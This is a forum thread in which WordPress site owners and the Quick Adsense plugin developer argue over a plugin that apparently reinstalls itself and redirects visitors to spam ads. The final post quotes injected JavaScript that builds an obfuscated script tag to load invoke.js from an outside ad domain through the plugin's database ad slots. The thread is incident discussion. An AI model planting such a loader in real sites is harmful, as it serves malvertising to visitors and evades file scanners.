Plugin installed without authorisation

Please secure your website, what you are saying is technically impossible to do for a plugin.

I am securing it. The only thing that breaks my website on the front end is a javascript injection from your plugin. I have blocked this plugin from being installed, but it is vulnerable to exploits.

I have been having the same issue for a few days now. When someone goes to my site, it redirects them to spam ads. I just changed my passwords so let’s see if that works.

I keep deleting the plugin and it keeps re-installing itself.

What you guys are claiming is technically impossible, A plugin cannot install by itself. It seems your sites have been hacked and someone is installing the plugin on your sites to insert their ads. Its not possible for any plugin to install by itself unless there is some code already on the site which can do it.

Also Quick Adsense had a full security audit just a couple months back from the WordPress plugin team and the plugin adhers to all WordPress plugin guidelines. Anyone is welcome to security audit the code. These are unfortunate allegations which has nothing to do with any plugin.

same issue here. seems that this plugin is too easy to configure with sql injection to insert malicious js

Can you help me with where the malicious code was inserted?
Header / Footer / In one of the Ad Slots?

This is really weird in the sense if someone malicious has elevated themselves with the permission to install plugins why would they alter a plugin code to insert their ads instead of directly editing your theme. I am assuming whoever is doing this is doing it to prevent detection.

Having received three reports about this, I will add a feature to verify the authenticity of the data with a hash in the next version (which probably is the first for any plugin) but its more important to actually figure out how someone is getting elevated permission to perform this database update.

Code has been inserted in header/footer codes + in “ads posts body” slots. as no widget has been added, the code were coming from header one.
the 3 first slots were feeded + the last one ?? just in case we miss it deleting the code ??

that way, there is no malicious code in php files. this does not hit php scanner.

the malicious code gets inside database using your plugin ??

here is an exemple of code inserted

"<script type="text/javascript">
	atOptions = {
		'key' : '4daf1db77f85db185034cebc94b70b32',
		'format' : 'iframe',
		'height' : 600,
		'width' : 160,
		'params' : {}
	};
	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://intersectionweigh.com/4daf1db77f85db185034cebc94b70b32/invoke.js"></scr' + 'ipt>');
</script>"